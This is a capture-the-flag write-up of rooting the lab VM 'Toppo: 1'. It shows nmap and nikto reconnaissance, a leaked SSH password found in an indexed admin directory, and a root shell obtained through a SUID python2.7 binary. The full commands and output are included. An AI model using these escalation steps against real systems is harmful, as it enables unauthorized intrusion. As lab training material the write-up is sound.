4 minute read

This is a simple write up on how I gained root access on the vulnerable virtual machine Toppo: 1.

Target Discovery and Information Gathering

The target vm is running on the ip adress 172.28.128.3. To get a first overview about which network applications are running a simple port scan with nmap is done.

 1hackbox> sudo nmap -sS -p 1-8080 172.28.128.3
 2Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-13 19:20 CEST
 3Nmap scan report for 172.28.128.3
 4Host is up (0.00021s latency).
 5Not shown: 8077 closed ports
 6PORT STATE SERVICE
 722/tcp open ssh
 880/tcp open http
 9111/tcp open rpcbind
10MAC Address: 08:00:27:52:40:DC (Oracle VirtualBox virtual NIC)
11
12Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

Only typical ports are found to be open - 22/tcp ssh and 80/tcp http. When trying to connect via SSH authentication is needed. So yet there’s no known way to connect properly. So let’s take a look at the website served at port 80. To analyze the provided directory structure, used HTTP headers as well as possible vulnerabilities nikto is used.

 1hackbox> nikto -nossl -host 172.28.128.3
 2
 3- Nikto v2.1.6
 4
 5---
 6
 7- Target IP: 172.28.128.3
 8- Target Hostname: 172.28.128.3
 9- Target Port: 80
10- Start Time: 2018-07-13 19:14:37 (GMT2)
11
12---
13
14- Server: Apache/2.4.10 (Debian)
15- Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
16- The anti-clickjacking X-Frame-Options header is not present.
17- The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
18- The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
19- No CGI Directories found (use '-C all' to force check all possible dirs)
20- Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
21- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
22- OSVDB-3268: /admin/: Directory indexing found.
23- OSVDB-3092: /admin/: This might be interesting...
24- OSVDB-3268: /img/: Directory indexing found.
25- OSVDB-3092: /img/: This might be interesting...
26- OSVDB-3268: /mail/: Directory indexing found.
27- OSVDB-3092: /mail/: This might be interesting...
28- OSVDB-3092: /manual/: Web server manual found.
29- OSVDB-3268: /manual/images/: Directory indexing found.
30- OSVDB-3233: /icons/README: Apache default file found.
31- 7535 requests: 0 error(s) and 15 item(s) reported on remote host
32- End Time: 2018-07-13 19:14:48 (GMT2) (11 seconds)
33
34---
35
36- 1 host(s) tested

Nikto found an interesting directory with activated indexing (see highlighted lines above). In the /admin/ directory a file named notes.txt with the following content can be found:

Note to myself :

I need to change my password :/ 12345ted123 is too outdated but the technology isn’t my thing iprefer go fishing or watching soccer .

Privilege Escalation

So now we have user and password to log in via SSH. The user ted does not have any privileged rights, so we need to find another way to gain root-access. First idea: find some suid-enabled binaries to exploit.

 1ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
 2/sbin/mount.nfs
 3/usr/sbin/exim4
 4/usr/lib/eject/dmcrypt-get-device
 5/usr/lib/dbus-1.0/dbus-daemon-launch-helper
 6/usr/lib/openssh/ssh-keysign
 7/usr/bin/gpasswd
 8/usr/bin/newgrp
 9/usr/bin/python2.7
10/usr/bin/chsh
11/usr/bin/at
12/usr/bin/mawk
13/usr/bin/chfn
14/usr/bin/procmail
15/usr/bin/passwd
16/bin/su
17/bin/umount
18/bin/mount

Check! There are multiple binaries with the suid-bit set. Especially /usr/bin/python2.7 and /usr/bin/mawk are of interest. mawk is an awk interpreter, but since I don’t know much about awk let’s try python2.7.
To spawn a shell using python the os-module can be used. The shell we want to spawn is /bin/sh -> /bin/dash.
Using /bin/sh we’re able to gain root access and read the /root/flag.txt to find the missing flag.

 1ted@Toppo:~$ python
 2Python 2.7.9 (default, Aug 13 2016, 16:41:35)
 3[GCC 4.9.2] on linux2
 4Type "help", "copyright", "credits" or "license" for more information.
 5>>> import os
 6>>> os.system("sh")
 7# whoami
 8root
 9# ls /root
10flag.txt
11# cat /root/flag.txt
12_________                                  
13|  _   _  |                                 
14|_/ | | \_|.--.   _ .--.   _ .--.    .--.   
15    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
16   _| |_ | \__. | | \__/ | | \__/ || \__. | 
17  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
18                 [__|     [__|              
19
20
21
22
23Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

Using /bin/bash for such an exploit is not going to work without additional parameter, since per default bash starts in the context of the real-user and not the effective user.

All in all this was an easy to ‘exploit’ vm.